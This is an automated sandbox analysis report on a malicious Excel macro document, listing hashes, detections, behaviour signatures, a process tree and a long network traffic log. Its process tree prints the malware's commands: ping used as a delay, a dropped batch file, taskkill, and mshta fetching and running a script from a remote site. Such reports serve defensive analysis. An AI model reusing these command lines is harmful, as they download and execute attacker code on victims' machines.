Windows Analysis Report
SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls
Analysis ID: 684675
MD5: 5081a754e710f34178dee80e5b1f15b4
SHA1: 8ce6a3a89c9ede6a40eee5d0b0488bff2098ca01
SHA256: 00f54cf5df13e3b9549f32fd39f986fc083559558d552cc0708e7a48e5f5bafe
Tags: xlsx

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Installs a global mouse hook
Uses taskkill to terminate processes
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 5228 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 4716 cmdline: cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 4000 cmdline: ping -n 8 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
      • cmd.exe (PID: 4188 cmdline: cmd /c start /min taskkill /f /im WINWORD.EXE MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • taskkill.exe (PID: 576 cmdline: taskkill /f /im WINWORD.EXE MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
          • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mshta.exe (PID: 5612 cmdline: mshta http://facextrade.com.br/wp-includes/certificates/4.txt MD5: 7083239CE743FDB68DFC933B7308E80A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls, Virustotal: Detection: 48%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls, Metadefender: Detection: 29%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls, ReversingLabs: Detection: 41%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls, Avira: detected
Source: facextrade.com.br, Virustotal: Detection: 5%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.3:49750 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\Public\Outlook.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\cmd.exe
Source: global traffic, DNS query: name: facextrade.com.br
Source: global traffic, DNS query: name: netdna.bootstrapcdn.com
Source: global traffic, DNS query: name: translate.google.com
Source: global traffic, DNS query: name: storage.ie6countdown.com
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49752 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49751
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49752
Source: global trafficTCP traffic: 192.168.2.3:49752 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49752 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49751
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49751
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49749 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49751 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49752 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49753 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49754 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49753 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49755 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49756 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49757 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49758 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49759 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49760 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49761 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49762 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49763 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49764 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49763 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49765 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49766 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49767 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49767 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49766 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49767 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49766 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49770 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49769 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49782 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49781 -> 187.45.240.69:80

Networking

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 8 127.0.0.1
